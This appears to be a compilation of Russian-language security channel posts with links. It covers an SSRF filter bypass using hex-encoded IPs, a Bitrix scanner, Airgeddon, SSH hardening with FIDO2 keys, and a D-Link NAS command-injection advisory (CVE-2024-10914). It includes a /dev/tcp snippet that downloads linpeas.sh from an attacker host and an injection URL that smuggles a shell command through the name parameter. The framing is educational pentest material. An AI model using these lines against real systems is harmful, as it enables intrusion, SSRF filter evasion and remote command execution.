Fsecurity | HH

🔺 Новый SSRF Bypass или как удивить коллегу под вечер #dns #ssrf #bypass #hex [ Оказалось способ древний, но я его увидел впервые :) ] Все мы используем IPv4 ежедневно. Все мы используем IPv6 ежедневно. Но прямо сейчас меня удивил один парень из чата, открыв глаза, что DNS оказывается резолвит даже IP в Hex формате. Hex IP — это представление IP-адреса в шестнадцатеричной системе. Обычно IP-адрес записывается в привычном формате с точками, например 192.168.0.1, где каждая часть — это десятичное значение байта (от 0 до 255). Однако этот же адрес можно представить в шестнадцатеричной системе. Принцип работы: IP-адрес состоит из 4 байтов, и каждый байт можно представить в шестнадцатеричном формате (от 00 до FF): Десятичный IP 192.168.0.1 представлен в виде четырех байт: 192 (0xC0), 168 (0xA8), 0 (0x00), 1 (0x01). Hex представление будет C0A801001. Как преобразовать IP-адрес в шестнадцатеричный формат: Возьмите каждый октет IP-адреса и переведите его в шестнадцатеричную систему. Объедините эти значения в строку без точек. Если вы введете URL вида http://0xC0A80001, браузер или сервер может интерпретировать это как запрос на http://192.168.0.1. Для удобной конвертации можете использовать следующую команду:

printf '%02X' 192 168 0 1 ; echo

Получете следующий вывод: C0A80001, подставляем 0x - hex код ➡️Переходим http://0xC0A80001 и вау, оно срабатывает 😧 Собственно коллега по работе (это про тебя Андрей)), что это можно использовать при тестировании SSRF. Дальше сами фантазируйте) Удивите и своих коллег, поделившись постом 🌝 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

🔗Ссылка: https://www.securitylab.ru/news/553861.php?r=3

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Сканер для проверки сайта Bitrix на наличие уязвимостей - Bitrix Scanner. Этот скрипт сканирует распространенные уязвимости в Bitrix: - открытые страницы входа в систему; - открытые страницы регистрации; - страницы, содержащие ошибки; - панели администратора; - content spoofing; - open redirect; - отраженный XSS; - сохраненный XSS с помощью загрузки файла (работает только с Apache); - SSRF. https://github.com/k1rurk/check_bitrix #tools #BitrixScanner #check #vulnerabilities

🔗Ссылка: https://www.securitylab.ru/news/553871.php

🔗Ссылка: https://habr.com/ru/companies/ru_mts/articles/856866/

Представьте ситуацию, когда на Linux машину нужно что-то положить но на машине нет привычных стредств типа wget, curl и даже по scp никак. LoL (living off the land) трюк по загрузке файлов на Linux хост. Будет полезно на всяких экзаменах типа OSCP и тп.

>exec 3<>/dev/tcp/<kali-ip>/22

>echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: <kali-ip>\r\nConnection: close\r\n\r\n" >&3

>cat <&3 > linpeas.sh

#linux #lol #upload #tips

🔗Ссылка: https://opennet.ru/62220/

Старая статья, но может кому-то интересно 👾 🔗Ссылка: https://xakep.ru/2015/08/11/metasploit-modules/

🔗Ссылка: https://teletype.in/@giscyberteam/argus_osint

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://www.rbc.ru/finances/07/11/2024/672b6a5b9a79472283c2bc78

Жизненный #meme

🔗Ссылка: https://opennet.ru/62221/

🔗Ссылка: https://www.securitylab.ru/news/553830.php

Что такое Airgeddon? Airgeddon — это мощный набор инструментов с открытым исходным кодом, предназначенный для проведения атак на беспроводные сети (Wi-Fi). Он фокусируется на атаках, которые используют уязвимости в безопасности Wi-Fi, с целью тестирования сетей и их защиты. Этот инструмент является одним из популярных среди специалистов по безопасности и хакеров, изучающих возможности взлома беспроводных сетей. В статье мы разберём, что такое Airgeddon, как он работает и для чего используется. 🔗Ссылка: https://kraken-academy.ru/book/%D0%A1%D1%82%D0%B0%D1%82%D1%8C%D0%B8%20%F0%9F%93%9C/airgeddon-guide/

Securing SSH with FIDO2 Небольшая заметка про прикладную задачу обеспечения дополнительного уровня контроля для доступа по SSH. Существует различные способы реализации 2FA для доступа на сервер по SSH с помощью YubiKey: ✅ PIV (Personal Identity Verification) модуль Суть заключается в том, что публичный и приватный ключ RSA/ ECC создается прямо на YubiKey, им подписывается сертификат для взаимодействия с SSH сервером через интерфейс PKCS #11 https://github.com/Yubico/yubico-piv-tool ssh -o "PKCS11Provider /usr/local/lib/libykcs11.dylib" user@remote Проверенный способ, который часто используется в компаниях, к недостаткам которого можно отнести необходимость использования дополнительного софта и ограничение на кол-во слотов на самом девайсе. ✅ OpenPGP Тут я даже не буду пытаться объяснить как работает GnuPG, а просто передам привет моему преподавателю криптографии😂 В двух словах, это самый хардкорный способ с точки зрения реализации, к преимуществам которого можно отнести возможность импорта существующих ключей и возможность распечатать бэкап на бумаге😎 https://gist.github.com/artizirk/d09ce3570021b0f65469cb450bee5e29 ✅ FIDO2 Самый удобный способ, который не требует дополнительного ПО, так как нужна только версия OpenSSH 8.2p1 и выше. В соответствии со стандартом FIDO2 ключи могут храниться на самом девайсе и отдельно: Резидентские ключи ssh-keygen -t ed25519-sk -O resident -O application=my_secure_ssh_host -O verify-required В данном случае ключ вообще никогда не покидает девайс и единственный недостаток это ограничение на кол-во слотов (на моем YubiKey 5 - 25 слотов) а также для более старыx версий прошивки, где используется CTAP (Client to Authenticator Protocol) v2.0 - это отсутствие возможности удалить только один ключ, вместо этого удалятся все 25🙈 Нерезидентские ключи ssh-keygen -t ed25519-sk Когда SSH сервер хочет аутентифицировать клиента, он отправляет Credential ID, это зашифрованная AES128 строка, которую расшифровать может только YubiKey, использованный при генерации ключа. Сам процесс происходит за счёт использования мастер-ключа уникального для каждого девайса, поэтому нерезидентские ключи не расходуют слоты и таким образом их количество неограниченно.

🔥 Критическая уязвимость в D-Link хранилках 🔥 🚨 CVE-2024-10914 — Обнаружена уязвимость в моделях D-Link DNS-320, DNS-320LW, DNS-325 и DNS-340L (версии до 28 октября 2024 года), позволяющая удалённым злоумышленникам выполнять произвольные команды. 🔴 Детали: Уязвимость связана с недостаточной проверкой параметра name в функции cgi_user_add файла /cgi-bin/account_mgr.cgi?cmd=cgi_user_add, что может привести к выполнению произвольных команд на устройстве. 💡 Рекомендации: D-Link не планирует выпускать обновления для этих моделей, так как они достигли конца жизненного цикла. Рекомендуется заменить устройства на поддерживаемые модели или, как временное решение, ограничить доступ к ним из внешних сетей. 🔗 PoC GitHub

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27

🔗Ссылка: https://www.securitylab.ru/news/553767.php